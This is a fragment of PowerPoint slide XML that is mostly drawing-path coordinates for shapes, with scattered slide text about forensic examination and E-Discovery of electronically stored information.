          <p:spPr>
            <a:xfrm>
              <a:off x="1999488" y="3799332"/>
              <a:ext cx="3352800" cy="3352800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3352800" h="3352800">
                  <a:moveTo>
                    <a:pt x="1676400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1627837" y="689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1579616" y="2747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1531756" y="6153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484276" y="10889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1437194" y="16937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1390529" y="24278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344299" y="32893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1298524" y="42764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253221" y="53872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208410" y="66198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164109" y="79723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1120336" y="94430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1077111" y="110299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034452" y="127312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="992377" y="145451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950906" y="164695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910056" y="185028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="869847" y="206429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830297" y="228882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791425" y="252366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="753250" y="276864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715789" y="302356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679062" y="328824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643088" y="356250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607885" y="384614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573471" y="413899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539865" y="444085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507087" y="475154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475154" y="507087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444085" y="539865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413899" y="573471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384614" y="607885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356250" y="643088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328824" y="679062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302356" y="715789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276864" y="753250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252366" y="791425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228882" y="830297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206429" y="869847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185028" y="910056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164695" y="950906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145451" y="992377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127312" y="1034452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110299" y="1077111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94430" y="1120336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79723" y="1164109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66198" y="1208410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53872" y="1253221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42764" y="1298524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32893" y="1344299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24278" y="1390529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16937" y="1437194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10889" y="1484276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6153" y="1531756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2747" y="1579616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689" y="1627837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1676400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689" y="1724962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2747" y="1773183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6153" y="1821043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10889" y="1868523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16937" y="1915605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24278" y="1962270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32893" y="2008500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42764" y="2054275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53872" y="2099578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66198" y="2144389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79723" y="2188690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94430" y="2232463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110299" y="2275688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127312" y="2318347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145451" y="2360422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164695" y="2401893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185028" y="2442743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206429" y="2482952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228882" y="2522502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252366" y="2561374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276864" y="2599549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302356" y="2637010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328824" y="2673737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356250" y="2709711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384614" y="2744914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413899" y="2779328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444085" y="2812934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475154" y="2845712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507087" y="2877645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539865" y="2908714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573471" y="2938900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607885" y="2968185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643088" y="2996549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679062" y="3023975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715789" y="3050443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="753250" y="3075935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791425" y="3100433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830297" y="3123917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="869847" y="3146370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910056" y="3167771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950906" y="3188104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="992377" y="3207348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034452" y="3225487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1077111" y="3242500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1120336" y="3258369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164109" y="3273076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208410" y="3286601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253221" y="3298927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1298524" y="3310035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344299" y="3319906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1390529" y="3328521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1437194" y="3335862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484276" y="3341910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1531756" y="3346646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1579616" y="3350052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1627837" y="3352110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676400" y="3352800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1724962" y="3352110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773183" y="3350052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821043" y="3346646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1868523" y="3341910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1915605" y="3335862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1962270" y="3328521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2008500" y="3319906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054275" y="3310035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2099578" y="3298927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2144389" y="3286601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2188690" y="3273076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2232463" y="3258369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2275688" y="3242500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2318347" y="3225487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360422" y="3207348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2401893" y="3188104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442743" y="3167771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2482952" y="3146370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2522502" y="3123917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2561374" y="3100433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2599549" y="3075935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2637010" y="3050443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2673737" y="3023975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2709711" y="2996549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2744914" y="2968185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2779328" y="2938900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2812934" y="2908714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2845712" y="2877645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2877645" y="2845712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908714" y="2812934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2938900" y="2779328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968185" y="2744914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2996549" y="2709711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023975" y="2673737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050443" y="2637010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3075935" y="2599549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3100433" y="2561374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123917" y="2522502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3146370" y="2482952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3167771" y="2442743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188104" y="2401893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207348" y="2360422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3225487" y="2318347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3242500" y="2275688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3258369" y="2232463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3273076" y="2188690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286601" y="2144389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3298927" y="2099578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3310035" y="2054275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3319906" y="2008500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3328521" y="1962270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3335862" y="1915605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3341910" y="1868523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3346646" y="1821043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3350052" y="1773183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3352110" y="1724962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3352800" y="1676400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3352110" y="1627837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3350052" y="1579616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3346646" y="1531756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3341910" y="1484276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3335862" y="1437194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3328521" y="1390529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3319906" y="1344299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3310035" y="1298524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3298927" y="1253221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286601" y="1208410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3273076" y="1164109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3258369" y="1120336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3242500" y="1077111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3225487" y="1034452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207348" y="992377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188104" y="950906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3167771" y="910056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3146370" y="869847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123917" y="830297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3100433" y="791425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3075935" y="753250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050443" y="715789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023975" y="679062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2996549" y="643088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968185" y="607885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2938900" y="573471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908714" y="539865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2877645" y="507087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2845712" y="475154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2812934" y="444085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2779328" y="413899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2744914" y="384614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2709711" y="356250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2673737" y="328824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2637010" y="302356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2599549" y="276864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2561374" y="252366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2522502" y="228882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2482952" y="206429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442743" y="185028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2401893" y="164695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360422" y="145451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2318347" y="127312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2275688" y="110299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2232463" y="94430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2188690" y="79723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2144389" y="66198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2099578" y="53872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054275" y="42764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2008500" y="32893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1962270" y="24278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1915605" y="16937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1868523" y="10889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821043" y="6153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773183" y="2747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1724962" y="689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676400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3427" y="4706112"/>
              <a:ext cx="1539239" cy="15392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95490" y="306451"/>
            <a:ext cx="20624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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E-Discovery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45580" y="760476"/>
            <a:ext cx="3131820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56029" y="1754772"/>
            <a:ext cx="13074650" cy="1555750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1873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475"/>
              </a:spcBef>
            </a:pP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Forensic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examination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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>demands</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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search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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>entire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drive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contains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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Electronically</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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Stored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Information</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="2540">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1380"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(ESI)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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through</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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E-Discovery.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="2540">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1370"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1748155" algn="l"/>
              </a:tabLst>
            </a:pP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Functions</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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	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E–Discovery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suite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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>are: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158293" y="4347971"/>
            <a:ext cx="4608830" cy="3192145"/>
            <a:chOff x="6158293" y="4347971"/>
            <a:chExt cx="4608830" cy="3192145"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6163055" y="4529454"/>
              <a:ext cx="4260215" cy="3005455"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4260215" h="3005454">
                  <a:moveTo>
                    <a:pt x="3872229" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3901482" y="38248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3929559" y="76904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3956465" y="115951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3982202" y="155371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4006774" y="195147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4030185" y="235262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4052437" y="275698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073534" y="316437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4093480" y="357463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4112278" y="398757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4129932" y="440303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4146444" y="482083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4161818" y="524079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4176058" y="566275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4189166" y="608653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4201147" y="651195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4212004" y="693884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4221740" y="736702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4230358" y="779633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4237863" y="822659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4244256" y="865762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4249543" y="908925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4253725" y="952131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4256807" y="995361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4258792" y="1038600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4259683" y="1081829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4259484" y="1125031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4258198" y="1168188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4255828" y="1211284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4252378" y="1254300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4247852" y="1297220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4242252" y="1340026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4235582" y="1382700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4227845" y="1425225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4219046" y="1467584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4209187" y="1509760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4198271" y="1551734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4186302" y="1593490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173284" y="1635010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4159220" y="1676276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4144112" y="1717272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4127966" y="1757980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4110783" y="1798382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4092568" y="1838461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073324" y="1878200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4053053" y="1917582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4031761" y="1956588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4009449" y="1995202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3986122" y="2033405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3961782" y="2071181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936434" y="2108513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3910080" y="2145382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3882724" y="2181772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3854370" y="2217665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3825020" y="2253044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3794679" y="2287890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3763349" y="2322188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3731033" y="2355919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3697737" y="2389066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3663462" y="2421611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3628212" y="2453538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3591990" y="2484828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554801" y="2515465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3516646" y="2545431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3477531" y="2574709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3437458" y="2603280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3396430" y="2631129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3354451" y="2658237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312983" y="2683707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3271086" y="2708183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3228776" y="2731669"/>
                  </a:lnTo>
                  <a:lnTo>
